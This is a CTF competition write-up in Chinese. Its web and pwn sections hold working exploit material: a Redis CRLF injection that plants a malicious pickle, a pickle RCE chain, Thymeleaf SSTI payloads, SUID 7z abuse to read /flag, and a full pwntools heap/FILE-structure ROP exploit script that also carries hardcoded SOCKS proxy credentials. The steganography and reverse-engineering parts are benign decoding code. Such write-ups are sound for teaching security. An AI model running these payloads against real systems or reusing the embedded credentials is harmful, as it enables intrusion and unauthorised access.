两个人ak了。
不过…我讨厌国内安全比赛。
web
auth
注册一个用户之后修改头像,avatar_url 支持 file:// 协议,可以任意文件读取,但是没权限读取 /flag,结果经过 base64 后放在头像框内
先读 /app/app.py
avatar_url=file:///app/app.py
发现存在 redis,尝试读 redis 持久化文件 dump.rdb
avatar_url=file:///var/lib/redis/dump.rdb
拿到 Flask secret_key
伪造 admin 的 session cookie 登录
/admin/online-users 会遍历 online_user:* 并反序列化。
虽然用了 RestrictedUnpickler,但放行了 builtins.getattr,而 OnlineUser 在白名单内
可构造 pickle 链:
getattr(getattr(getattr(getattr(OnlineUser, "__init__"), "__globals__"), "get")("os"), "system")(cmd)
由于反序列化的目标是 online_user:<user>,需要把该键覆盖成恶意 pickle
利用点仍是 avatar_url:将请求打到 127.0.0.1:6379,通过 CRLF + RESP 进行协议注入,发送:
AUTH redispass123
SET online_user:<user> <pickle_payload>
EXPIRE online_user:<user> 3600
通过读取 file:///proc/1/task/1/children,拿到子进程 PID:11 14 20
逐个读 file:///proc/<pid>/cmdline
在 pid=11 看到可疑启动命令:
python3 /opt/mcp_service/mcp_server_secure_e938a2d234b7968a885bbbbb63cde7b9.py
直接读这个脚本文件,发现里面存在:
SimpleXMLRPCServer(("0.0.0.0", 54321), ...)
暴露方法 execute_command,同时硬编码 token 为 mcp_secure_token_b2rglxd
在容器内执行 xmlrpc.client.ServerProxy("http://127.0.0.1:54321/") 可以调用
所以反序列化命令可以直接写成:
python3 -c "import xmlrpc.client;print(xmlrpc.client.ServerProxy('http://127.0.0.1:54321/').execute_command('mcp_secure_token_b2rglxd','cat /flag'))" >/tmp/mcp_out.txt
最后用任意文件读取从 /tmp/mcp_out.txt 中拿到 flag
thymeleaf
1. PRNG 状态泄露
用户注册时会从后端返回一个 PRNG 取值,可以从中获得其内部状态,然后反推回 admin 账号的密码
MASK = (1 << 48) - 1
LOW47 = (1 << 47) - 1
def prev_candidates(cur):
base = ((cur & LOW47) << 1) & MASK
return [base, base | 1]
2. Thymeleaf SSTI
控制器中存在
return "admin :: " + section;
当 Thymeleaf 看到 :: 时,会把它当作 fragment expression 去解析,故此处存在 SSTI 漏洞
在高版本 Thymeleaf 里,直接写 ${...} 通常会被拦,但通过预处理和字面量拼接可以绕过:
__|$${...}|__::.x
在通过 SSTI 进行 RCE 的过程中,由于不同 JDK 版本的 Runtime.exec 的多个重载顺序可能不同,需要爆破之后找出可用的重载下标
rt = "''.getClass().forName('java.lang.Runtime').getMethods.?[name=='getRuntime'][0].invoke(null)"
expr = f"{rt}.getClass.getMethods.?[name=='exec'][{idx}].invoke({rt},'/usr/bin/id')"
RCE 之后进去的用户是 ctf,需要 root 用户才能读取 /flag
3. 7z提权
find suid:
find / -perm -4000 -type f
发现最主要的是 7z 带 SUID,最后使用 /usr/bin/7z a -ttar -an -so /flag 直接获得 flag 内容
pwn
MailSystem
- 注册13个用户可以把admin指针给覆盖掉从而可以登录
- 下界没有考虑导致可以从mail_user_to_user leak到libc,从而覆盖stdout。
- 然后栈迁移 -> rop。
from pwn import *
import os, shutil, tempfile
import socket
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'info'
EXE = './pwn'
LIBC = './libc.so.6'
LD = './ld-linux-x86-64.so.2'
elf = context.binary = ELF(EXE, checksec=False)
libc = ELF(LIBC, checksec=False)
stdout_offset = -7
host = '192.0.100.2'
port = 9999
socks5 = '3.dart.ccsssc.com:26177'
socks_user = '3hm3n1br'
socks_pass = 'tbkzq6tp'
def _normalize_socks5(value: str) -> str:
    """Return the stripped proxy spec, or '' when the proxy is disabled.

    Any falsy value, and the words 0/false/off/no/none (case-insensitive),
    count as "disabled".
    """
    if not value:
        return ''
    cleaned = str(value).strip()
    disabled_words = ('0', 'false', 'off', 'no', 'none')
    return '' if cleaned.lower() in disabled_words else cleaned
def _normalize_opt(value: str) -> str:
    """Return the stripped option text, or '' for None and "disabled" words.

    The words 0/false/off/no/none (case-insensitive) are treated as unset.
    """
    text = '' if value is None else str(value).strip()
    if text.lower() in ('0', 'false', 'off', 'no', 'none'):
        return ''
    return text
def _enable_socks5(proxy_spec: str, username: str = '', password: str = ''):
    """Route every new socket through a SOCKS5 proxy given as ``host:port``.

    Does nothing when the spec normalizes to ''. Raises ValueError when the
    spec is not ``host:port`` with a numeric port. On success it replaces
    ``socket.socket`` process-wide with PySocks' ``socksocket``.
    """
    spec = _normalize_socks5(proxy_spec)
    if not spec:
        return
    proxy_host, colon, proxy_port = spec.rpartition(':')
    if not (colon and proxy_host and proxy_port.isdigit()):
        raise ValueError(f'Invalid SOCKS5 proxy: {spec!r}, expected host:port')
    # Imported only after validation so a bad spec fails even without PySocks.
    import socks
    user = _normalize_opt(username)
    secret = _normalize_opt(password)
    socks.set_default_proxy(
        socks.SOCKS5,
        proxy_host,
        int(proxy_port),
        username=user or None,
        password=secret or None,
    )
    socket.socket = socks.socksocket
    auth_state = 'enabled' if user or secret else 'disabled'
    info(f'Using SOCKS5 proxy: {proxy_host}:{proxy_port} (auth={auth_state})')
def _prepare_loader(path: str) -> str:
    """Return a path to an executable copy of the dynamic loader.

    If ``path`` is already executable it is returned unchanged. Otherwise the
    file is copied once to ``<tempdir>/ld.mail_system`` with mode 0755, and
    that copy is returned (an existing copy is reused as-is).
    """
    if os.access(path, os.X_OK):
        return path
    fallback = os.path.join(tempfile.gettempdir(), 'ld.mail_system')
    if os.path.exists(fallback):
        return fallback
    shutil.copy2(path, fallback)
    os.chmod(fallback, 0o755)
    return fallback
def start():
    """Open the target tube (remote via SOCKS5, or local via the bundled loader).

    Consumes output up to the first ``Your choice: `` prompt and returns the tube.
    """
    if not args.REMOTE:
        loader = _prepare_loader(LD)
        io = process([loader, '--library-path', '.', EXE], stdin=PIPE, stdout=PIPE)
    else:
        _enable_socks5(socks5, socks_user, socks_pass)
        io = remote(host, port)
    io.recvuntil(b'Your choice: ')
    return io
def register(io, name: bytes, password: bytes):
    """Pick menu entry 2 and answer the name/password prompts.

    Returns everything received up to the next ``Your choice: `` prompt.
    """
    io.sendline(b'2')
    dialogue = (
        (b'Input your name: ', name),
        (b'Input your password: ', password),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
    return io.recvuntil(b'Your choice: ')
def login_user(io, name: bytes, password: bytes):
    """Pick menu entry 1 and answer the name/password prompts.

    Returns everything received up to the next ``Your choice: `` prompt.
    """
    io.sendline(b'1')
    dialogue = (
        (b'Input your name: ', name),
        (b'Input your password: ', password),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
    return io.recvuntil(b'Your choice: ')
def login_admin(io):
    """Log in through menu entry 1 with a NUL byte as both name and password.

    Returns everything received up to the next ``Your choice: `` prompt.
    """
    nul_line = b'\x00\n'
    io.sendline(b'1')
    for prompt in (b'Input your name: ', b'Input your password: '):
        io.recvuntil(prompt)
        # send(), not sendline(): the newline is already part of the payload.
        io.send(nul_line)
    return io.recvuntil(b'Your choice: ')
def write_mail(io, data: bytes):
    """Write ``data`` (1..256 bytes) as the current user's mail via menu entry 1.

    The body is sent raw with no trailing newline. Returns everything received
    up to the next ``Your choice: `` prompt.
    """
    size = len(data)
    assert 1 <= size <= 0x100
    io.sendline(b'1')
    io.recvuntil(b'How many bytes do you want to write? (1-256): ')
    io.sendline(str(size).encode())
    io.recvuntil(b'bytes):\n')
    io.send(data)
    menu = io.recvuntil(b'Your choice: ')
    return menu
def send_mail(io, dst: int, overwrite: bool = True):
    """Send the current mail to user ``dst`` via menu entry 3.

    If the service asks ``Overwrite? (y/n): ``, answers ``y`` or ``n``
    according to ``overwrite``. Returns all output up to the next menu prompt.
    """
    menu_prompt = b'Your choice: '
    confirm_prompt = b'Overwrite? (y/n): '
    io.sendline(b'3')
    io.recvuntil(b'Who do you want to send the mail to? (input user ID 1-12)\n')
    io.sendline(str(dst).encode())
    seen = io.recvuntil([confirm_prompt, menu_prompt])
    if not seen.endswith(confirm_prompt):
        return seen
    io.sendline(b'y' if overwrite else b'n')
    return seen + io.recvuntil(menu_prompt)
def logout_user(io):
    """Pick entry 4 of the user menu and return output up to the next prompt."""
    io.sendline(b'4')
    menu = io.recvuntil(b'Your choice: ')
    return menu
def admin_logout(io):
    """Pick entry 5 of the admin menu and return output up to the next prompt."""
    io.sendline(b'5')
    menu = io.recvuntil(b'Your choice: ')
    return menu
def admin_forward(io, src: int, dst: int, which: int, overwrite: bool = True, final_mode: str = 'prompt'):
    """Forward one of ``src``'s mails to ``dst`` through admin menu entry 4.

    ``src`` and ``dst`` are sent verbatim, so out-of-range values such as a
    negative ``dst`` reach the service unchanged. With ``final_mode='prompt'``
    the call waits for the next menu prompt after choosing ``which``; any
    other value drains output for 0.5 s instead, for when no prompt is
    expected to come back. Returns the collected output.
    """
    menu_prompt = b'Your choice: '
    confirm_prompt = b'Overwrite? (y/n): '
    pick_prompt = b'Which mail would you like to forward?\n'

    io.sendline(b'4')
    io.recvuntil(b'Enter source user ID (whose mail to forward): (1-12) ')
    io.sendline(str(src).encode())
    io.recvuntil(b'Enter destination user ID (1-12): ')
    io.sendline(str(dst).encode())

    out = io.recvuntil([confirm_prompt, pick_prompt, menu_prompt])
    if out.endswith(confirm_prompt):
        io.sendline(b'y' if overwrite else b'n')
        out += io.recvuntil([pick_prompt, menu_prompt])

    # No mail list was offered: the service went straight back to the menu.
    if b'Which mail would you like to forward?' not in out:
        return out

    # The prompt that follows the mail list is consumed but not kept.
    io.recvuntil(menu_prompt)
    io.sendline(str(which).encode())
    if final_mode == 'prompt':
        tail = io.recvuntil(menu_prompt)
    else:
        tail = io.recvrepeat(0.5)
    return out + tail
def ban_user(io, name: bytes, password: bytes, victim_id: int = 8):
    """Log in as ``name`` and spam mail at ``victim_id`` until the account is banned.

    Each round pipelines six write-mail + send-mail sequences in one send.
    Returns the output that contained ``Account has been banned!``. Raises
    RuntimeError if the login fails or the session looks like it left the
    user menu. Loops until one of those happens.
    """
    banner = login_user(io, name, password)
    if b'Welcome back' not in banner:
        raise RuntimeError(f'login failed for {name!r}: {banner!r}')

    # One pipelined round trip:
    #   "1" write mail, "1" byte long, content "A" (no newline: exactly 1 byte is read),
    #   "3" send mail, <victim_id>, "y" to confirm overwrite.
    round_trip = b''.join((
        b'1\n', b'1\n', b'A',
        b'3\n', str(victim_id).encode(), b'\n', b'y\n',
    ))
    batch = 6
    total = 0
    while True:
        io.send(round_trip * batch)
        total += batch
        out = io.recvuntil(b'Your choice: ', timeout=5)
        out += io.recvrepeat(0.2)
        if b'Account has been banned!' in out:
            success(f'{name!r} banned after {total} sends')
            return out
        relogged = b'Welcome back' in out
        in_user_menu = b'1. Write mail' in out
        if relogged and not in_user_menu:
            raise RuntimeError(f'{name!r} state changed unexpectedly: {out!r}')
        info(f'{name!r} not banned yet, sent={total}')
def takeover_admin(io):
    """Register u1..u13 (banning u1..u5 in between) and log in as admin.

    Per the writeup, registering a 13th user overwrites the admin pointer,
    after which the NUL-credential admin login succeeds. Asserts that the
    admin banner was received.
    """
    def creds(n):
        return f'u{n}'.encode(), f'p{n}'.encode()

    for n in range(1, 9):
        register(io, *creds(n))
    for n in range(1, 6):
        ban_user(io, *creds(n))
    # u9..u12 fill the remaining slots; u13 is the out-of-bounds registration.
    for n in range(9, 14):
        register(io, *creds(n))
    banner = login_admin(io)
    assert b'Welcome admin!' in banner
def leak_libc(io, src_uid: int = 8):
    """Leak a libc pointer by forwarding a crafted mail to index ``stdout_offset``.

    The mail is 0x20 bytes (flags 0xfbad1800 plus three zero qwords) followed
    by a 2-byte value landing at offset 0x20. Presumably that is the low half
    of ``_IO_write_base`` in glibc's FILE layout; confirm against the target
    libc. Returns ``(libc_base, stdout_address)``.
    """
    fake_head = flat(0xfbad1800, 0, 0, 0) + p16(0xb780)
    user = f'u{src_uid}'.encode()
    secret = f'p{src_uid}'.encode()

    admin_logout(io)
    login_user(io, user, secret)
    write_mail(io, fake_head)
    logout_user(io)
    login_admin(io)

    # No menu prompt is awaited after the forward, hence final_mode='repeat'.
    dump = admin_forward(io, src_uid, stdout_offset, 1, final_mode='repeat')
    after_list = dump.split(b'Which mail would you like to forward?\n', 1)[1]
    leak = after_list.split(b'Mail forwarded', 1)[0]
    stdout = u64(leak[0x20:0x28])
    libc_base = stdout - libc.sym['_IO_2_1_stdout_']
    success(f'libc_base = {hex(libc_base)}')
    success(f'stdout = {hex(stdout)}')
    return libc_base, stdout
def build_stdout_payload(libc_base: int, stdout: int):
    """Build the 0x100-byte fake ``_IO_2_1_stdout_`` image and the stage-2 address.

    A known-good stdout template is laid down first, then the exploit fields
    are patched over it. Hard-coded offsets (0x217600, 0x2170c0, 0x21ca70,
    0x21a9a0, 0x21d000) are specific to the bundled libc. Returns
    ``(payload_bytes, stage2_addr)``.
    """
    stderr = libc_base + libc.sym['_IO_2_1_stderr_']
    stdin = libc_base + libc.sym['_IO_2_1_stdin_']
    stage2_addr = libc_base + 0x21d000
    wide_data = stdout - 0x50
    setcontext_3d = libc_base + libc.sym['setcontext'] + 0x3d
    read_addr = libc_base + libc.sym['read']
    file_jumps = libc_base + 0x217600
    wfile_jumps = libc_base + 0x2170c0
    lock_ptr = libc_base + 0x21ca70
    all_ones = 0xffffffffffffffff

    image = bytearray(0x100)

    def poke(width: int, off: int, val: int):
        # width 8 -> full qword; width 4 -> low dword only.
        if width == 8:
            image[off:off + 8] = p64(val)
        else:
            image[off:off + 4] = p32(val & 0xffffffff)

    # known-good stdout template for this libc
    template = [(8, 0x00, 0xfbad2887)]
    template += [(8, off, stdout + 0x83) for off in range(0x08, 0x40, 8)]
    template += [
        (8, 0x40, stdout + 0x84),
        (8, 0x48, 0),
        (8, 0x50, 0),
        (8, 0x58, 0),
        (8, 0x60, 0),
        (8, 0x68, stdin),
        (8, 0x70, 1),
        (8, 0x78, all_ones),
        (8, 0x80, 0x0a000000),
        (8, 0x88, lock_ptr),
        (8, 0x90, all_ones),
        (8, 0x98, 0),
        (8, 0xa0, libc_base + 0x21a9a0),
        (8, 0xa8, 0),
        (8, 0xb0, 0),
        (8, 0xb8, 0),
        (4, 0xc0, 0xffffffff),
        (8, 0xc8, 0),
        (8, 0xd0, 0),
        (8, 0xd8, file_jumps),
        (8, 0xe0, stderr),
        (8, 0xe8, stdout),
        (8, 0xf0, stdin),
        (8, 0xf8, 0),
    ]

    # exploit patch:
    # _IO_wfile_overflow -> _IO_wdoallocbuf -> call [wide_vtable+0x68]
    # with wide_data = stdout-0x50 and wide_vtable = stdout.
    patch = [
        (8, 0x00, 0xfbad2085),     # clear _IO_NO_WRITES and clear the 0x800 bit
        (8, 0x18, 0),              # wide+0x68 -> rdi = 0
        (8, 0x20, stage2_addr),    # wide+0x70 -> rsi = stage2 buffer
        (8, 0x38, 0x400),          # wide+0x88 -> rdx = count
        (8, 0x48, 0),              # wide+0x98 -> rcx
        (8, 0x50, stage2_addr),    # wide+0xa0 -> rsp = stage2 buffer
        (8, 0x58, read_addr),      # wide+0xa8 -> return to read
        (8, 0x68, setcontext_3d),  # stdout[0x68] == fake_wide_vtable[0x68]
        (8, 0x90, stdout),         # wide+0xe0 -> fake wide_vtable = stdout
        (8, 0xa0, wide_data),      # _wide_data = stdout-0x50
        (4, 0xc0, 1),              # _mode > 0
        (8, 0xd8, wfile_jumps),    # use _IO_wfile_jumps
    ]

    # Template first, patch second: patched fields must win.
    for width, off, val in template + patch:
        poke(width, off, val)
    return bytes(image), stage2_addr
# Stage 1: become admin, leak libc, and prepare the fake stdout structure.
io = start()
takeover_admin(io)
success("stage1 done: fake admin acquired")
libc_base, stdout = leak_libc(io)
stdout_payload, stage2_addr = build_stdout_payload(libc_base, stdout)

# Gadgets are looked up in the unrelocated libc and rebased by hand.
rop = ROP(libc)
pop_rdi = libc_base + rop.find_gadget(["pop rdi", "ret"]).address
pop_rsi = libc_base + rop.find_gadget(["pop rsi", "ret"]).address
pop_rdx_r12 = libc_base + next(
    addr
    for addr, g in rop.gadgets.items()
    if g.insns == ["pop rdx", "pop r12", "ret"]
)
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
flag_addr = stage2_addr + 0x180
buf_addr = stage2_addr + 0x200

# Stage 2 ROP chain (open/read/write); fd 3 assumes the flag is the first
# file the process opens after stdin/stdout/stderr.
stage2 = flat(
    # open(flag_addr, 0, 0)
    pop_rdi, flag_addr, pop_rsi, 0, pop_rdx_r12, 0, 0, open_addr,
    # read(3, buf_addr, 0x100)
    pop_rdi, 3, pop_rsi, buf_addr, pop_rdx_r12, 0x100, 0, read_addr,
    # write(1, buf_addr, 0x100)
    pop_rdi, 1, pop_rsi, buf_addr, pop_rdx_r12, 0x100, 0, write_addr,
)
# The path string sits at stage2_addr + 0x180, matching flag_addr above.
stage2 = stage2.ljust(0x180, b"\x00") + b"/flag\x00"
stage2 = stage2.ljust(0x400, b"\x00")

# Plant the fake stdout via u10's mail, forwarded to the negative index.
admin_logout(io)
login_user(io, b"u10", b"p10")
write_mail(io, stdout_payload)
logout_user(io)
login_admin(io)
admin_forward(io, 10, stdout_offset, 1, final_mode="repeat")

# Trigger output through the corrupted stdout, then feed stage 2 to the
# read() set up by the payload.
io.send(b"5\n")
sleep(0.1)
io.send(stage2)
data = io.recvrepeat(2.0)
print(data)
io.interactive()
misc
steg
xxd看一眼
直接删掉前面的东西,libmagic能正常识别了。
但是打不开,图片IDAT CRC爆炸了。把idat拼起来之后错位。
写一个策略尽可能多恢复点东西:
import zlib
from pathlib import Path
from typing import Iterable
from PIL import Image
PNG_SIG = b'\x89PNG\r\n\x1a\n'
def iter_png_chunks(png: bytes):
    """Yield ``(type, data, chunk_start, chunk_end)`` for each chunk in ``png``.

    Raises ValueError if the signature is missing. Iteration stops silently at
    the first chunk whose declared length runs past the buffer, or right after
    IEND. CRCs are not checked.
    """
    if not png.startswith(PNG_SIG):
        raise ValueError('Not a PNG stream')
    total = len(png)
    pos = len(PNG_SIG)
    # 12 = 4-byte length + 4-byte type + 4-byte CRC (an empty chunk).
    while pos + 12 <= total:
        size = int.from_bytes(png[pos:pos + 4], 'big')
        tag = png[pos + 4:pos + 8]
        body_at = pos + 8
        next_pos = body_at + size + 4
        if next_pos > total:
            return
        yield tag, png[body_at:body_at + size], pos, next_pos
        pos = next_pos
        if tag == b'IEND':
            return
def get_png_info(png: bytes):
    """Return the IHDR fields of ``png`` as a dict.

    Keys: width, height, bit_depth, color_type, compression, filter_method,
    interlace, channels. ``channels`` is the per-pixel sample count derived
    from the colour type (0 for an unknown type). Raises ValueError when IHDR
    is absent or not 13 bytes long.
    """
    samples_per_pixel = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}
    for ctype, data, _start, _end in iter_png_chunks(png):
        if ctype != b'IHDR':
            continue
        if len(data) != 13:
            raise ValueError('Bad IHDR length')
        # The last five IHDR fields are one byte each.
        bit_depth, color_type, compression, filter_method, interlace = data[8:13]
        return {
            'width': int.from_bytes(data[0:4], 'big'),
            'height': int.from_bytes(data[4:8], 'big'),
            'bit_depth': bit_depth,
            'color_type': color_type,
            'compression': compression,
            'filter_method': filter_method,
            'interlace': interlace,
            'channels': samples_per_pixel.get(color_type, 0)
        }
    raise ValueError('IHDR not found')
def paeth_predictor(a: int, b: int, c: int):
    """Return whichever of ``a`` (left), ``b`` (up), ``c`` (up-left) is nearest to a + b - c.

    Ties are broken in the order a, then b, then c.
    """
    estimate = a + b - c
    dist_a, dist_b, dist_c = (abs(estimate - n) for n in (a, b, c))
    if dist_a <= min(dist_b, dist_c):
        return a
    return b if dist_b <= dist_c else c
def reconstruct_scanline(filter_type: int, filtered: bytes, prior: bytes, channels: int = 3):
    """Undo one PNG scanline filter and return the reconstructed bytes.

    ``filtered`` is the scanline without its leading filter-type byte and
    ``prior`` is the previous reconstructed scanline. ``channels`` is used as
    the byte distance to the pixel on the left. Raises ValueError for a
    filter type outside 0..4.
    """
    if filter_type not in (0, 1, 2, 3, 4):
        raise ValueError(f'Invalid filter type: {filter_type}')
    if filter_type == 0:  # None
        return bytes(filtered)

    out = bytearray(len(filtered))
    for pos, byte in enumerate(filtered):
        left = out[pos - channels] if pos >= channels else 0
        if filter_type == 1:  # Sub
            predicted = left
        elif filter_type == 2:  # Up
            predicted = prior[pos]
        elif filter_type == 3:  # Average
            predicted = (left + prior[pos]) // 2
        else:  # Paeth
            up = prior[pos]
            up_left = prior[pos - channels] if pos >= channels else 0
            predicted = paeth_predictor(left, up, up_left)
        out[pos] = (byte + predicted) & 0xff
    return bytes(out)
# Main program: rebuild a viewable image from a PNG whose decompressed IDAT
# stream contains stray extra bytes that push scanlines out of alignment.
input_file = Path('carved.png')
output_file = Path('carved_repaired.png')

# Read PNG
png_data = input_file.read_bytes()

# Parse PNG info
info = get_png_info(png_data)
width = info['width']
height = info['height']
num_channels = info['channels']
if num_channels == 0:
    raise ValueError(f"Unsupported PNG colour type: {info['color_type']}")

# Extract and concatenate all IDAT chunks. The file is scanned for the raw
# 'IDAT' tag instead of walking the chunk list, so damaged chunk framing
# earlier in the file does not hide later data.
idat_data = bytearray()
idx = 0
while True:
    i = png_data.find(b'IDAT', idx)
    if i < 0:
        break
    if i >= 4:
        length = int.from_bytes(png_data[i - 4:i], 'big')
        data_start = i + 4
        data_end = data_start + length
        if data_end <= len(png_data):
            idat_data.extend(png_data[data_start:data_end])
    idx = i + 1
idat_data = bytes(idat_data)

# decompressobj() is used here rather than zlib.decompress().
raw = zlib.decompressobj().decompress(idat_data)

# One filter-type byte plus the pixel bytes per row (assumes 8-bit samples).
row_len = 1 + num_channels * width
expected = row_len * height
# Surplus bytes in the stream = the largest cumulative shift a row can have.
max_delta = len(raw) - expected
if max_delta < 0:
    raise ValueError(
        f'Decompressed IDAT is too short: got {len(raw)} bytes, need at least {expected}'
    )

# dp: state d is the cumulative shift of the current row. A row scores 1 when
# the byte at its shifted start is a valid filter type (0..4); the shift may
# grow by at most 12 bytes from one row to the next.
neg = -10 ** 9
prev = [neg] * (max_delta + 1)
prev[0] = 1 if raw[0] <= 4 else 0
parents = []
for r in range(1, height):
    cur = [neg] * (max_delta + 1)
    par = [-1] * (max_delta + 1)
    for d in range(max_delta + 1):
        best = neg
        best_pd = -1
        lo = max(0, d - 12)
        for pd in range(lo, d + 1):
            if prev[pd] > best:
                best = prev[pd]
                best_pd = pd
        if best_pd >= 0:
            idx_offset = d + r * row_len
            if idx_offset < len(raw):
                cur[d] = best + (1 if raw[idx_offset] <= 4 else 0)
                par[d] = best_pd
    parents.append(par)
    prev = cur


def endpoint_score(d):
    """Score a final shift: the DP score minus 0.2 per byte short of max_delta."""
    base_score = prev[d]
    penalty = abs(d - max_delta) * 0.2
    return base_score - penalty


# Walk the parent pointers back from the best final shift to get every row's shift.
end_delta = max(range(max_delta + 1), key=endpoint_score)
path = [end_delta]
for r in range(height - 1, 0, -1):
    end_delta = parents[r - 1][end_delta]
    path.append(end_delta)
path.reverse()

# Unfilter each row at its recovered offset.
stride = num_channels * width
rows = []
prior = bytearray(stride)
for r, d in enumerate(path):
    start = d + r * row_len
    filter_type = raw[start]
    filtered = raw[start + 1:start + 1 + stride]
    try:
        recon = reconstruct_scanline(filter_type, filtered, prior, num_channels)
        rows.append(recon)
        prior = recon
    except ValueError:
        # Invalid filter byte: emit a black row and restart prediction from zeros.
        recon = bytes(stride)
        rows.append(recon)
        prior = bytearray(stride)
img_data = b''.join(rows)

# Choose the Pillow mode from the channel count rather than assuming RGB.
# Palette images (colour type 3) come out as greyscale indices.
pil_mode = {1: 'L', 2: 'LA', 3: 'RGB', 4: 'RGBA'}[num_channels]
img = Image.frombytes(pil_mode, (width, height), img_data)
img.save(output_file)
拿出来是这样一张。
低位lsb,RGB拼接。能看到zip包。
这里小文件可以用crc32爆破了。
于是恢复出来
pass
is
c1!x
xtLf
%fXY
PkaA
解压 flag.txt,里面是零宽字符,按 0/1 编码复原。
zw = ''.join(ch for ch in text if ch in '\u200b\u200c')
if not zw:
raise ValueError('no zero-width data found')
bits = ''.join('0' if ch == '\u200b' else '1' for ch in zw)
usable = len(bits) // 8 * 8
raw = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
try:
return raw.decode('utf-8')
except UnicodeDecodeError:
return raw.decode('latin1')
reverse
re1
这里拼了个pyc,拿下来pylingual还原。
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 'Payload_To_PixelCode_video.py'
# Bytecode version: 3.7.0 (3394)
# Source timestamp: 2026-01-04 04:02:18 UTC (1767499338)
from PIL import Image
import math
import os
import sys
import numpy as np
import imageio
from tqdm import tqdm
def file_to_video(input_file, width=640, height=480, pixel_size=8, fps=10, output_file='video.mp4'):
if not os.path.isfile(input_file):
return None
file_size = os.path.getsize(input_file)
binary_string = ''
with open(input_file, 'rb') as f:
for chunk in tqdm(iterable=iter(lambda: f.read(1024), b''), total=math.ceil(file_size / 1024), unit='KB', desc='读取文件'):
binary_string += ''.join((f'{byte:08b}' for byte in chunk))
xor_key = '10101010'
xor_binary_string = ''
for i in range(0, len(binary_string), 8):
chunk = binary_string[i:i + 8]
if len(chunk) == 8:
chunk_int = int(chunk, 2)
key_int = int(xor_key, 2)
xor_result = chunk_int ^ key_int
xor_binary_string += f'{xor_result:08b}'
else:
xor_binary_string += chunk
binary_string = xor_binary_string
pixels_per_image = width // pixel_size * (height // pixel_size)
num_images = math.ceil(len(binary_string) / pixels_per_image)
frames = []
for i in tqdm(range(num_images), desc='生成视频帧'):
start = i * pixels_per_image
bits = binary_string[start:start + pixels_per_image]
if len(bits) < pixels_per_image:
bits = bits + '0' * (pixels_per_image - len(bits))
img = Image.new('RGB', (width, height), color='white')
for r in range(height // pixel_size):
row_start = r * (width // pixel_size)
row_end = (r + 1) * (width // pixel_size)
row = bits[row_start:row_end]
for c, bit in enumerate(row):
color = (0, 0, 0) if bit == '1' else (255, 255, 255)
x1, y1 = (c * pixel_size, r * pixel_size)
img.paste(color, (x1, y1, x1 + pixel_size, y1 + pixel_size))
frames.append(np.array(img))
with imageio.get_writer(output_file, fps=fps, codec='libx264') as writer:
for frame in tqdm(frames, desc='写入视频帧'):
writer.append_data(frame)
if __name__ == '__main__':
input_path = 'payload'
if os.path.exists(input_path):
file_to_video(input_path)
else:
sys.exit(1)
简单还原下。
from PIL import Image
import cv2
import math
import numpy as np
from tqdm import tqdm

# Inverse of file_to_video: sample the centre of every pixel_size x pixel_size
# cell of each frame (dark = 1, light = 0), pack the bits MSB-first into
# bytes and undo the per-byte XOR.
cap = cv2.VideoCapture("video.mp4")
width = 640
height = 480
pixel_size = 8
fps = 10
half_cell = pixel_size // 2
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))

# Per-frame boolean arrays, joined once at the end; appending to a str per
# pixel is quadratic in the worst case.
frame_bits = []
for _ in tqdm(range(total_frames)):
    ret, frame = cap.read()
    if not ret:
        break
    if frame.shape[0] < height or frame.shape[1] < width:
        raise ValueError(f'frame is {frame.shape[1]}x{frame.shape[0]}, expected at least {width}x{height}')
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    # Cell centres in row-major order: the same order the encoder drew them.
    centers = frame[half_cell:height:pixel_size, half_cell:width:pixel_size]
    # Threshold the channel mean; lossy video compression smears pure black/white.
    frame_bits.append((centers.mean(axis=2) < 128).ravel())
cap.release()

xor_key = "10101010"
all_bits = np.concatenate(frame_bits) if frame_bits else np.zeros(0, dtype=bool)
# Drop a trailing partial byte instead of letting packbits zero-pad it.
usable = all_bits.size // 8 * 8
packed = np.packbits(all_bits[:usable].astype(np.uint8))
data = bytearray((packed ^ int(xor_key, 2)).tobytes())
open("1", "wb").write(data)
import hashlib
strs = """8277e0910d750195b448797616e091ad
0cc175b9c0f1b6a831c399e269772661
4b43b0aee35624cd95b910189b3dc231
e358efa489f58062f10dd7316b65649e
f95b70fdc3088560732a5ac135644506
c81e728d9d4c2f636f067f89cc14862c
92eb5ffee6ae2fec3ad71c777531578f
c4ca4238a0b923820dcc509a6f75849b
8fa14cdd754f91cc6554c9e71929cce7
c9f0f895fb98ab9159f51fd0297e236d
336d5ebc5436534e61d16e63ddfca327
eccbc87e4b5ce2fe28308fd9f2a7baf3
cfcd208495d565ef66e7dff9f98764da
a87ff679a2f3e71d9181a67b7542122c
e4da3b7fbbce2345d7772b0674a318d5
e1671797c52e15f763380b45e841ec32
8f14e45fceea167a5a36dedd4bea2543
1679091c5a880faf6fb5e6087eb1b2dc
4a8a08f09d37b73795649038408b5f33
cbb184dd8e05c9709e5dcaedaa0495cf""".splitlines()
# Lookup table from md5(hex) of a single character to that character.
# range(256) covers every code point 0..255; the original range(0, 255)
# silently left out chr(255).
maps = {hashlib.md5(chr(code).encode()).hexdigest(): chr(code) for code in range(256)}
for s in strs:
    print(maps[s], end="")
re2
类似upx的壳。解压完了走这个地方0x4014E0跳出。
没带windows只能unicorn跑了。需要模拟几个系统函数。
api_stubs = {
"LoadLibraryA": api_base + 0x100,
"ExitProcess": api_base + 0x200,
"GetProcAddress": api_base + 0x300,
"VirtualProtect": api_base + 0x400,
"exit": api_base + 0x500,
}
能取出来一个 base64,解码之后是下一个 stage。
import base64
import struct
import os
import pefile
from unicorn import Uc
from unicorn.x86_const import *
from unicorn.unicorn_const import *
# Map the packed PE into a fresh x86-64 Unicorn instance and replace the
# imports the unpacking stub needs with one-byte `ret` stubs.
os.makedirs("out", exist_ok=True)
packed_pe = pefile.PE("challenge.exe")
with open("challenge.exe", "rb") as packed_file:
    packed_image = packed_file.read()
packed_base = packed_pe.OPTIONAL_HEADER.ImageBase
# Round the image size up to a whole number of 4 KiB pages for mem_map.
